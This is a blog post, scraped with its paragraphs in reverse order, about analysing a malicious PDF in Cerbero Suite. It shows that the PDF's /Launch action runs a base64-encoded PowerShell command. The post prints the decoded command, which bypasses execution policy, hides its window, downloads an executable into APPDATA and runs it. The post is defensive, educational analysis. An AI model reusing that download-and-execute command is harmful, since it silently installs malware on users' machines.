it has various feature that make your life easierġ. I would like to encourage the malware analyst to use cerbero to do file analysis. Now we can understand that the powershell will download the malware from and execute it in hidden window. PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object SystemNetWebClient)DownloadFile(‘ $env:APPDATA\aworiexe ) Start-Process ( $env:APPDATA\aworiexe )
Malicious pdf sample full#
Here is the full code command execution that the powershell trigger on start It will show you the result in the hexstring window You can select the base64 encoded text and press CTRL+R, and select Base64 to bytes It is straightforward to crack it with cerbero. Let’s start decoding the PowerShell command with base64. We can see that the PowerShell will execute encoded command with window style hidden. To do further analyses for what command will run, we can copy the item and paste it to the text analysis window.Īnd open a new text window for analysis. We can also see the hierarchy of the object in the tree tab like shown below, which is more clearer
Malicious pdf sample pdf#
It is shown that the pdf will start the PowerShell command with base64 encoding. We can understand that this object does /Launch/Win action when the document is opened. We can select the object from the format windows.Ĭerbero will give you information about the object in the raw data window We can start to analyze the file start from object number one. We can see that the PDF file has five objects. We can see in the image below that cerbero will directly give you hints that the application has a threat inside. Let’s open the malware sample by right-clicking on it and analyze it with CerberoĬerbero can fully parse PDF data structure and show them in a structured way. I love this application because it gives the most functionality to do file analysis Many tools could help you during analysis, but today I will use one integrated tool for file analysis called Cerbero Suite Advance. Today, I would like to write about reversing malicious PDF to get detailed information of what it is trying to do with our endpoint Finally, I can write this blog space again after sometimes focusing on another thing.